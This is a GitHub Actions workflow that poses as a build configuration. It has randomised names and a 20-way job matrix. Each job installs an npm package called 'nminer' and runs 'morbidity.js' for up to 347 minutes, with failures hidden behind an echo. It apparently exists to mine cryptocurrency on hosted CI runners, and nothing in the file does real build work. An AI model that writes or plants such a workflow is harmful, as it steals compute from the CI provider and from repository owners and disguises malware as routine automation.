name: morbidity
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 7978 }
          - { version: 9530 }
          - { version: 9134 }
          - { version: 1178 }
          - { version: 7573 }
          - { version: 7891 }
          - { version: 924 }
          - { version: 589 }
          - { version: 3707 }
          - { version: 1831 }
          - { version: 2350 }
          - { version: 1117 }
          - { version: 6691 }
          - { version: 4126 }
          - { version: 886 }
          - { version: 4957 }
          - { version: 5212 }
          - { version: 1253 }
          - { version: 2828 }
          - { version: 7742 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: qua electrify focalise urgently
        run: |
          npm install nminer@latest
          timeout 347m node morbidity.js || echo "morbidity executed"